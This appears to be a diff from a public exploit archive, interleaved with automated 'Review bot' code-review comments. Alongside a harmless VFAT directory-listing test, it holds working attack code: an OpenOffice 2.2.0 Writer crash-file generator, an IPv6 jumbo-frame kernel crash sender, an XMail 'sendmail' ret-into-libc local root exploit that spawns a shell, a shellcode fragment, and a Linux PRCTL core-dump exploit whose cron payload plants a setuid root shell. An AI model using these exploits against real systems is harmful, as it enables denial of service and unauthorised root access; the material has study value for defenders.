#include <sys/types.h>
#include <sys/ioctl.h>
#include <dirent.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
struct kernel_dirent {
long d_ino;
long d_off;
unsigned short d_reclen;
char d_name[256]; /* We must not include limits.h! */
};
#define VFAT_IOCTL_READDIR_BOTH _IOR('r', 1, struct kernel_dirent [2])
#define VFAT_IOCTL_READDIR_SHORT _IOR('r', 2, struct kernel_dirent [2])
int main(void)
{
int fd = open(".", O_RDONLY);
struct kernel_dirent de[2];
while (1) {
int i = ioctl(fd, VFAT_IOCTL_READDIR_BOTH, (long)de);
if (i == -1) break;
if (de[0].d_reclen == 0) break;
printf("SFN: reclen=%2d off=%d ino=%d, %-12s",
de[0].d_reclen, de[0].d_off, de[0].d_ino, de[0].d_name);
if (de[1].d_reclen)
printf("\tLFN: reclen=%2d off=%d ino=%d, %s",
de[1].d_reclen, de[1].d_off, de[1].d_ino, de[1].d_name);
printf("\n");
}
return 0;
}
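Review bot: the result of `open(".", O_RDONLY)` at the top of main() is never checked, so a failed open feeds -1 into the ioctl loop, which then returns -1 and the program exits silently as if the directory were empty; test for `fd < 0` and report the error with perror(). The printf calls also pass the `long` fields `d_off` and `d_ino` to `%d` conversions; use `%ld` so the output is not garbled on 64-bit builds.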

platforms/linux/dos/30091.py Executable file
@ -0,0 +1,91 @@
source: http://www.securityfocus.com/bid/24186/info
The OpenOffice 'Writer' component is prone to a remote denial-of-service vulnerability.
Successful exploits may allow remote attackers to cause denial-of-service conditions on the webserver running the affected application.
OpenOffice 2.2.0 is vulnerable; other versions may also be affected.
import sys
import time
print "--------------------------------------------------------"
print " OpenOffice.org 2.2.0 Writer Denial of Service "
print " url: http://www.openoffice.org/ "
print " "
print " author: shinnai "
print " mail: shinnai[at]autistici[dot]org "
print " site: http://shinnai.altervista.org "
print " "
print " If you want, you can change the file extension in .doc "
print "--------------------------------------------------------"
exploit = \
"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00\x00\x00\x00\x00\x00"+\
"\x00\x00\x00\x00\x00\x00\x00\x00\x3E\x00\x03\x00\xFE\xFF\x09\x00"+\
"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+\
"\x2A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+\
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xEC\xA5\xC1\x00\x23\x60\x10\x04\x00\x00\xF0\x12\xBF\x00\x00\x00"+\
"\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06\x00\x00\x01\x08\x00\x00"+\
"\x0E\x00\x62\x6A\x62\x6A\x35\x47\x35\x47"
while 1:
print " OPTIONS "
print " 1 -> Create file exploit.otp "
print " 2 -> Quit\n "
print "--------------------------------------------------------"
choice = 0
while 1:
try:
choice = int(raw_input("Make your choice: "))
if choice != 1 and choice != 2:
print "ehm... Invalid choice...\n"
else:
break
except:
print "ehm... Invalid choice...\n"
if choice == 1:
flag = 1
try:
fileOut = open('exploit.otp','w')
fileOut.write(exploit)
fileOut.close()
print "File created!\nBe safe!"
except:
print "Unable to create file."
if choice == 2:
print "Be safe!"
time.sleep(2)
sys.exit()
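Review bot: `flag = 1` inside the `choice == 1` branch is assigned and never read anywhere in the file; remove it. The two bare `except:` clauses also catch KeyboardInterrupt, so Ctrl-C at the prompt prints "Invalid choice" instead of exiting; catch `ValueError` around the `int(raw_input(...))` conversion and `IOError` around the file write instead.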

@ -1,134 +1,134 @@
/* /*
* Clemens Kurtenbach <ckurtenbach at s21sec . com> * Clemens Kurtenbach <ckurtenbach at s21sec . com>
* PoC code for exploiting the jumbo bug found in * PoC code for exploiting the jumbo bug found in
* linux kernels >=2.6.20 and <=2.6.21.1 * linux kernels >=2.6.20 and <=2.6.21.1
* gcc -O2 ipv6_jumbo_crash.c -o ipv6_jumbo_crash * gcc -O2 ipv6_jumbo_crash.c -o ipv6_jumbo_crash
* *
*/ */
/* io */ /* io */
#include <stdio.h> #include <stdio.h>
#include <string.h> #include <string.h>
#include <stdlib.h> #include <stdlib.h>
/* network */ /* network */
#include <sys/socket.h> #include <sys/socket.h>
#include <linux/if_packet.h> #include <linux/if_packet.h>
#include <linux/if_ether.h> #include <linux/if_ether.h>
#include <linux/if_arp.h> #include <linux/if_arp.h>
#include <netdb.h> #include <netdb.h>
#include <linux/if.h> #include <linux/if.h>
#define MY_FRAME_LEN 1145 #define MY_FRAME_LEN 1145
char *resolve6(unsigned char *target) { char *resolve6(unsigned char *target) {
char *ret_addr; char *ret_addr;
struct in6_addr my_in6; struct in6_addr my_in6;
char *glob_addr = (char *) &my_in6; char *glob_addr = (char *) &my_in6;
struct addrinfo addr_hints, *addr_result; struct addrinfo addr_hints, *addr_result;
unsigned char out[64]; unsigned char out[64];
memset(&addr_hints, 0, sizeof(addr_hints)); memset(&addr_hints, 0, sizeof(addr_hints));
addr_hints.ai_family = AF_INET6; addr_hints.ai_family = AF_INET6;
if (getaddrinfo(target, NULL, &addr_hints, &addr_result) != 0) { if (getaddrinfo(target, NULL, &addr_hints, &addr_result) != 0) {
printf("getaddrinfo() error\n"); printf("getaddrinfo() error\n");
exit(1); exit(1);
} }
if(getnameinfo(addr_result->ai_addr, addr_result->ai_addrlen, out, sizeof(out), NULL, 0, NI_NUMERICHOST) != 0){ if(getnameinfo(addr_result->ai_addr, addr_result->ai_addrlen, out, sizeof(out), NULL, 0, NI_NUMERICHOST) != 0){
printf("getnameinfo() error\n"); printf("getnameinfo() error\n");
exit(1); exit(1);
} }
if(inet_pton(AF_INET6, out, glob_addr) < 0) { if(inet_pton(AF_INET6, out, glob_addr) < 0) {
printf("inet_pton() error\n"); printf("inet_pton() error\n");
exit(1); exit(1);
} }
if((ret_addr = malloc(16)) == NULL) { if((ret_addr = malloc(16)) == NULL) {
printf("malloc() error\n"); printf("malloc() error\n");
exit(1); exit(1);
} }
memcpy(ret_addr, my_in6.s6_addr, 16); memcpy(ret_addr, my_in6.s6_addr, 16);
return ret_addr; return ret_addr;
} }
int main(int argc, char *argv[]) { int main(int argc, char *argv[]) {
if (argc < 4) { if (argc < 4) {
printf("usage: ./ipv6_jumbo_crash <fe80::1:2:3> <00:11:22:33:44:55> <eth0>\n"); printf("usage: ./ipv6_jumbo_crash <fe80::1:2:3> <00:11:22:33:44:55> <eth0>\n");
exit(1); exit(1);
} }
/* handle IPv6 destination */ /* handle IPv6 destination */
unsigned char *dest_ip = resolve6(argv[1]); unsigned char *dest_ip = resolve6(argv[1]);
/* handle MAC */ /* handle MAC */
unsigned char dest_mac[7]; unsigned char dest_mac[7];
sscanf(argv[2], "%x:%x:%x:%x:%x:%x", sscanf(argv[2], "%x:%x:%x:%x:%x:%x",
(unsigned int*)&dest_mac[0], (unsigned int*)&dest_mac[1], (unsigned int*)&dest_mac[0], (unsigned int*)&dest_mac[1],
(unsigned int*)&dest_mac[2], (unsigned int*)&dest_mac[3], (unsigned int*)&dest_mac[2], (unsigned int*)&dest_mac[3],
(unsigned int*)&dest_mac[4], (unsigned int*)&dest_mac[5]); (unsigned int*)&dest_mac[4], (unsigned int*)&dest_mac[5]);
/* handle interface */ /* handle interface */
unsigned char *iface; unsigned char *iface;
iface = argv[3]; iface = argv[3];
/* buffer for ethernet frame */ /* buffer for ethernet frame */
void *buffer = (void*)malloc(MY_FRAME_LEN); void *buffer = (void*)malloc(MY_FRAME_LEN);
/* pointer to ethenet header */ /* pointer to ethenet header */
unsigned char *etherhead = buffer; unsigned char *etherhead = buffer;
struct ethhdr *eh = (struct ethhdr *)etherhead; struct ethhdr *eh = (struct ethhdr *)etherhead;
/* our MAC address */ /* our MAC address */
unsigned char src_mac[6] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55 }; unsigned char src_mac[6] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55 };
unsigned char src_ip[16] = { 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02}; unsigned char src_ip[16] = { 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02};
/* prepare socket */ /* prepare socket */
int s; int s;
s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0) { if (s < 0) {
printf("cannot create socket: [%d]\n",s); printf("cannot create socket: [%d]\n",s);
exit(1); exit(1);
} }
/* RAW communication */ /* RAW communication */
struct sockaddr_ll socket_address; struct sockaddr_ll socket_address;
socket_address.sll_family = PF_PACKET; socket_address.sll_family = PF_PACKET;
socket_address.sll_protocol = htons(ETH_P_IP); socket_address.sll_protocol = htons(ETH_P_IP);
socket_address.sll_ifindex = if_nametoindex(iface); socket_address.sll_ifindex = if_nametoindex(iface);
socket_address.sll_hatype = ARPHRD_ETHER; socket_address.sll_hatype = ARPHRD_ETHER;
socket_address.sll_pkttype = PACKET_OTHERHOST; socket_address.sll_pkttype = PACKET_OTHERHOST;
socket_address.sll_halen = ETH_ALEN; socket_address.sll_halen = ETH_ALEN;
/* set the frame header */ /* set the frame header */
memcpy((void*)buffer, (void*)dest_mac, ETH_ALEN); memcpy((void*)buffer, (void*)dest_mac, ETH_ALEN);
memcpy((void*)(buffer+ETH_ALEN), (void*)src_mac, ETH_ALEN); memcpy((void*)(buffer+ETH_ALEN), (void*)src_mac, ETH_ALEN);
eh->h_proto = 0xdd86; // IPv6 eh->h_proto = 0xdd86; // IPv6
/* the buffer we want to send */ /* the buffer we want to send */
unsigned char bad_buffer[] = { unsigned char bad_buffer[] = {
0x60, 0x3b, 0x50, 0x15, 0x04, 0x08, 0x00, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x3b, 0x50, 0x15, 0x04, 0x08, 0x00, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x43, 0x6e, 0xc2, 0x05, 0x23 }; 0x00, 0x43, 0x6e, 0xc2, 0x05, 0x23 };
memcpy((void*)(buffer+14), (void*)bad_buffer, MY_FRAME_LEN); memcpy((void*)(buffer+14), (void*)bad_buffer, MY_FRAME_LEN);
/* overwrite our src and dst ip */ /* overwrite our src and dst ip */
memcpy((void*)(buffer+22), (void*)src_ip, 16); memcpy((void*)(buffer+22), (void*)src_ip, 16);
memcpy((void*)(buffer+38), dest_ip, 16); memcpy((void*)(buffer+38), dest_ip, 16);
/* send the buffer */ /* send the buffer */
int send_result = 0; int send_result = 0;
send_result = sendto(s, buffer, MY_FRAME_LEN, 0, (struct sockaddr*)&socket_address, sizeof(socket_address)); send_result = sendto(s, buffer, MY_FRAME_LEN, 0, (struct sockaddr*)&socket_address, sizeof(socket_address));
if (send_result == -1) { if (send_result == -1) {
printf("could not send frame: [%d]\n", send_result); printf("could not send frame: [%d]\n", send_result);
exit(1); exit(1);
} }
else printf("frame send to ip [%s] with mac [%s] on iface [%s]\n",argv[1],argv[2],argv[3]); else printf("frame send to ip [%s] with mac [%s] on iface [%s]\n",argv[1],argv[2],argv[3]);
return 0; return 0;
} }
// milw0rm.com [2008-01-11] // milw0rm.com [2008-01-11]
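Review bot: the old and new sides of this hunk are character-for-character identical, so the only thing that changed in these 134 lines is whitespace or line endings, which the commit message "Updated 12_08_2013" does not mention. A line-ending normalisation should be called out in the message (or handled once through .gitattributes) rather than rewriting the blame history of whole files silently alongside the new entries.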

@ -1,251 +1,251 @@
/* /*
* XMail 1.21 'sendmail' local exploit (ret-into-libc) * XMail 1.21 'sendmail' local exploit (ret-into-libc)
* Yields uid root || gid mail * Yields uid root || gid mail
* By qaaz [at] centrum [dot] cz, 2005 * By qaaz [at] centrum [dot] cz, 2005
*/ */
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
#include <unistd.h> #include <unistd.h>
#include <string.h> #include <string.h>
#include <signal.h> #include <signal.h>
#include <sys/types.h> #include <sys/types.h>
#include <sys/wait.h> #include <sys/wait.h>
#include <sys/select.h> #include <sys/select.h>
#define TARGET "/var/MailRoot/bin/sendmail" #define TARGET "/var/MailRoot/bin/sendmail"
#define NM "nm" #define NM "nm"
#define GREP "grep" #define GREP "grep"
#define MKDIR "mkdir" #define MKDIR "mkdir"
#define TMP "/tmp" #define TMP "/tmp"
#define MAILROOT TMP"/mr" #define MAILROOT TMP"/mr"
#define ID "/usr/bin/id" #define ID "/usr/bin/id"
#define SH "/bin/sh" #define SH "/bin/sh"
#define OVERLEN (256+12 + 16) #define OVERLEN (256+12 + 16)
/* EmitRecipients() stack */ /* EmitRecipients() stack */
/* | locals + padding + PUSHes | RET | Arg1... | */ /* | locals + padding + PUSHes | RET | Arg1... | */
/* |<--------- OVERLEN ------->| */ /* |<--------- OVERLEN ------->| */
#define MAX(x,y) (((x)>(y)) ? (x) : (y)) #define MAX(x,y) (((x)>(y)) ? (x) : (y))
char *libc_file = NULL; char *libc_file = NULL;
unsigned int libc_base = 0; unsigned int libc_base = 0;
unsigned int stack_base = 0; unsigned int stack_base = 0;
unsigned int file_addr = 0; unsigned int file_addr = 0;
unsigned int system_addr = 0; unsigned int system_addr = 0;
int pid; int pid;
int pi[2], po[2], pe[2]; int pi[2], po[2], pe[2];
void sigchild(int sig) void sigchild(int sig)
{ {
if (waitpid(pid, NULL, WNOHANG) == pid) { if (waitpid(pid, NULL, WNOHANG) == pid) {
printf("[*] Vuln terminated\n"); printf("[*] Vuln terminated\n");
exit(-1); exit(-1);
} }
} }
void killchild() void killchild()
{ {
if (pid) kill(pid, SIGKILL); if (pid) kill(pid, SIGKILL);
} }
char bad_chars(char *buf, int len) char bad_chars(char *buf, int len)
{ {
int i; int i;
if (len == 0) len == strlen(buf); if (len == 0) len == strlen(buf);
for (i = 0; i < len; i++) { for (i = 0; i < len; i++) {
if (!buf[i] || strchr("<> \t,\":;'\r\n", buf[i])) if (!buf[i] || strchr("<> \t,\":;'\r\n", buf[i]))
return buf[i]; return buf[i];
} }
return 0; return 0;
} }
unsigned int get_sym(char *lib, char *sym) unsigned int get_sym(char *lib, char *sym)
{ {
FILE *f; FILE *f;
char buf[1024]; char buf[1024];
unsigned int val = 0; unsigned int val = 0;
sprintf(buf, "%s -D %s | %s -w %s", NM, lib, GREP, sym); sprintf(buf, "%s -D %s | %s -w %s", NM, lib, GREP, sym);
if (f = popen(buf, "r")) { if (f = popen(buf, "r")) {
fgets(buf, sizeof(buf), f); fgets(buf, sizeof(buf), f);
sscanf(buf, "%08lx %*s %*s", &val); sscanf(buf, "%08lx %*s %*s", &val);
pclose(f); pclose(f);
} }
return val; return val;
} }
unsigned int check_sym(char *lib, char *sym, unsigned int base) unsigned int check_sym(char *lib, char *sym, unsigned int base)
{ {
unsigned int offs = get_sym(lib, sym); unsigned int offs = get_sym(lib, sym);
unsigned int addr = base + offs; unsigned int addr = base + offs;
if (!offs) { if (!offs) {
printf("[-] %s: not found?\n", sym); printf("[-] %s: not found?\n", sym);
return 0; return 0;
} }
if (bad_chars((char *) &addr, 4)) { if (bad_chars((char *) &addr, 4)) {
printf("[-] %s: 0x%08x, bad chars\n", sym, addr); printf("[-] %s: 0x%08x, bad chars\n", sym, addr);
return 0; return 0;
} }
printf("[+] %s: 0x%08x\n", sym, addr); printf("[+] %s: 0x%08x\n", sym, addr);
return addr; return addr;
} }
void do_maps(int pid) void do_maps(int pid)
{ {
FILE *f; FILE *f;
char buf[1024]; char buf[1024];
sprintf(buf, "/proc/%d/maps", pid); sprintf(buf, "/proc/%d/maps", pid);
if (!(f = fopen(buf, "r"))) return; if (!(f = fopen(buf, "r"))) return;
while (fgets(buf, sizeof(buf), f)) { while (fgets(buf, sizeof(buf), f)) {
unsigned int addr_beg, addr_end; unsigned int addr_beg, addr_end;
char pathname[1024]; char pathname[1024];
int offset; int offset;
pathname[0] = 0; pathname[0] = 0;
sscanf(buf, "%08lx-%08lx %*s %08lx %*s %*s %s", sscanf(buf, "%08lx-%08lx %*s %08lx %*s %*s %s",
&addr_beg, &addr_end, &offset, pathname); &addr_beg, &addr_end, &offset, pathname);
if (offset < 0) if (offset < 0)
stack_base = addr_end; stack_base = addr_end;
else if (strstr(pathname, "/libc") && (!libc_base || addr_beg < libc_base)) else if (strstr(pathname, "/libc") && (!libc_base || addr_beg < libc_base))
libc_base = addr_beg, libc_file = (char *) strdup(pathname); libc_base = addr_beg, libc_file = (char *) strdup(pathname);
} }
fclose(f); fclose(f);
} }
void do_syms() void do_syms()
{ {
if (!(file_addr = check_sym(libc_file, "stdout", libc_base)) if (!(file_addr = check_sym(libc_file, "stdout", libc_base))
&& !(file_addr = check_sym(libc_file, "stderr", libc_base)) && !(file_addr = check_sym(libc_file, "stderr", libc_base))
&& !(file_addr = check_sym(libc_file, "stdin", libc_base))) { && !(file_addr = check_sym(libc_file, "stdin", libc_base))) {
printf("[-] Can't use std files\n"); printf("[-] Can't use std files\n");
exit(-1); exit(-1);
} }
if (!(system_addr = check_sym(libc_file, "system", libc_base))) { if (!(system_addr = check_sym(libc_file, "system", libc_base))) {
printf("[-] Can't use system()\n"); printf("[-] Can't use system()\n");
exit(-1); exit(-1);
} }
} }
void do_shell() void do_shell()
{ {
fd_set fds; fd_set fds;
struct timeval tv; struct timeval tv;
int retval, maxfd; int retval, maxfd;
char buf[1024]; char buf[1024];
maxfd = MAX(0, MAX(po[0], pe[0])) + 1; maxfd = MAX(0, MAX(po[0], pe[0])) + 1;
while (1) { while (1) {
FD_ZERO(&fds); FD_ZERO(&fds);
FD_SET(0, &fds); FD_SET(0, &fds);
FD_SET(po[0], &fds); FD_SET(po[0], &fds);
FD_SET(pe[0], &fds); FD_SET(pe[0], &fds);
tv.tv_sec = 0; tv.tv_sec = 0;
tv.tv_usec = 100; tv.tv_usec = 100;
if (select(maxfd, &fds, NULL, NULL, &tv) == -1) break; if (select(maxfd, &fds, NULL, NULL, &tv) == -1) break;
if (FD_ISSET(0, &fds)) { if (FD_ISSET(0, &fds)) {
if ((retval = read(0, buf, sizeof(buf))) <= 0) break; if ((retval = read(0, buf, sizeof(buf))) <= 0) break;
write(pi[1], buf, retval); write(pi[1], buf, retval);
} }
if (FD_ISSET(po[0], &fds)) { if (FD_ISSET(po[0], &fds)) {
if ((retval = read(po[0], buf, sizeof(buf))) <= 0) break; if ((retval = read(po[0], buf, sizeof(buf))) <= 0) break;
write(1, buf, retval); write(1, buf, retval);
} }
if (FD_ISSET(pe[0], &fds)) { if (FD_ISSET(pe[0], &fds)) {
if ((retval = read(pe[0], buf, sizeof(buf))) <= 0) break; if ((retval = read(pe[0], buf, sizeof(buf))) <= 0) break;
write(2, buf, retval); write(2, buf, retval);
} }
} }
} }
int main(int argc, char *argv[]) int main(int argc, char *argv[])
{ {
if (argc > 1 && !strcmp(argv[1], "-sh")) { if (argc > 1 && !strcmp(argv[1], "-sh")) {
setresuid(geteuid(), geteuid(), geteuid()); setresuid(geteuid(), geteuid(), geteuid());
setresgid(getegid(), getegid(), getegid()); setresgid(getegid(), getegid(), getegid());
system(ID); system(ID);
execl(SH, SH, "-i", NULL); execl(SH, SH, "-i", NULL);
perror("execl"); perror("execl");
exit(-1); exit(-1);
} }
if (pipe(pi) || pipe(po) || pipe(pe)) { if (pipe(pi) || pipe(po) || pipe(pe)) {
perror("[-] pipe"); perror("[-] pipe");
return -1; return -1;
} }
if ((pid = fork()) == -1) { if ((pid = fork()) == -1) {
perror("[-] fork"); perror("[-] fork");
return -1; return -1;
} }
if (pid) { if (pid) {
unsigned int i; unsigned int i;
char buf[10*1024]; char buf[10*1024];
atexit(killchild); atexit(killchild);
signal(SIGCHLD, sigchild); signal(SIGCHLD, sigchild);
sleep(1); sleep(1);
printf("[*] Reading maps...\n"); printf("[*] Reading maps...\n");
do_maps(pid); do_maps(pid);
printf("[%c] libc: 0x%08x\n", libc_base?'+':'-', libc_base); printf("[%c] libc: 0x%08x\n", libc_base?'+':'-', libc_base);
if (!libc_base) exit(-1); if (!libc_base) exit(-1);
printf("[%c] stack: 0x%08x\n", stack_base?'+':'-', stack_base); printf("[%c] stack: 0x%08x\n", stack_base?'+':'-', stack_base);
if (!stack_base) exit(-1); if (!stack_base) exit(-1);
printf("[*] Getting symbols...\n"); printf("[*] Getting symbols...\n");
do_syms(); do_syms();
strcpy(buf, "To: h4h4@"); strcpy(buf, "To: h4h4@");
for (i = 0; i < OVERLEN-5; i++) // "h4h4@" == 5 for (i = 0; i < OVERLEN-5; i++) // "h4h4@" == 5
strcat(buf, "A"); strcat(buf, "A");
strncat(buf, (char *) &system_addr, 4); strncat(buf, (char *) &system_addr, 4);
strncat(buf, (char *) &file_addr, 4); strncat(buf, (char *) &file_addr, 4);
i = stack_base - 5000; i = stack_base - 5000;
strncat(buf, (char *) &i, 4); strncat(buf, (char *) &i, 4);
strcat(buf, "\n"); strcat(buf, "\n");
write(pi[1], buf, strlen(buf)); write(pi[1], buf, strlen(buf));
sleep(1); do_shell(); sleep(1); do_shell();
printf("[*] Done\n"); printf("[*] Done\n");
exit(1); exit(1);
} }
else { else {
char buf[10*1024]; char buf[10*1024];
char *_env[3] = { NULL, "MAIL_ROOT="MAILROOT, NULL }; char *_env[3] = { NULL, "MAIL_ROOT="MAILROOT, NULL };
char *_arg[3] = { TARGET, "-t", NULL }; char *_arg[3] = { TARGET, "-t", NULL };
sprintf(buf, "%s -p %s/spool/temp", MKDIR, MAILROOT); sprintf(buf, "%s -p %s/spool/temp", MKDIR, MAILROOT);
system(buf); system(buf);
sprintf(buf, "%10000s -sh", argv[0]); sprintf(buf, "%10000s -sh", argv[0]);
_env[0] = (char *) strdup(buf); _env[0] = (char *) strdup(buf);
printf("[*] Executing vuln...\n"); printf("[*] Executing vuln...\n");
close(0); dup2(pi[0], 0); close(0); dup2(pi[0], 0);
close(1); dup2(po[1], 1); close(1); dup2(po[1], 1);
close(2); dup2(pe[1], 2); close(2); dup2(pe[1], 2);
execve(_arg[0], _arg, _env); execve(_arg[0], _arg, _env);
perror("[-] execve"); perror("[-] execve");
return -1; return -1;
} }
exit(1); exit(1);
} }
// milw0rm.com [2005-10-20] // milw0rm.com [2005-10-20]
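Review bot: `if (len == 0) len == strlen(buf);` in bad_chars() is a comparison, not an assignment, so the `len == 0` branch has no effect; the only caller passes len 4, so behaviour is unchanged, but if the intent was to default to the string length it should read `len = strlen(buf);`, and compilers warn about the discarded result. As with the previous file, both sides of this hunk are identical, so this is a whitespace-only change.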

@ -44,6 +44,6 @@ int main (int argc, char ** argv)
memcpy((char *)out+63, shellcode, strlen(shellcode)); memcpy((char *)out+63, shellcode, strlen(shellcode));
execl (BIN, BIN, "-xsokdir", out, 0x0); execl (BIN, BIN, "-xsokdir", out, 0x0);
} }
// milw0rm.com [2004-01-02] // milw0rm.com [2004-01-02]

@ -1,52 +1,52 @@
/*****************************************************/ /*****************************************************/
/* Local r00t Exploit for: */ /* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */ /* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */ /* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */ /* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */ /* By: */
/* - dreyer <luna@aditel.org> (main PoC code) */ /* - dreyer <luna@aditel.org> (main PoC code) */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */ /* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ] */ /* [ 10.Jul.2006 ] */
/*****************************************************/ /*****************************************************/
#include <stdio.h> #include <stdio.h>
#include <sys/time.h> #include <sys/time.h>
#include <sys/resource.h> #include <sys/resource.h>
#include <unistd.h> #include <unistd.h>
#include <linux/prctl.h> #include <linux/prctl.h>
#include <stdlib.h> #include <stdlib.h>
#include <sys/types.h> #include <sys/types.h>
#include <signal.h> #include <signal.h>
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n"; char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() { int main() {
int child; int child;
struct rlimit corelimit; struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n"); printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n"); printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n"); printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit); setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n"); printf("[*] Creating Cron entry\n");
if ( !( child = fork() )) { if ( !( child = fork() )) {
chdir("/etc/cron.d"); chdir("/etc/cron.d");
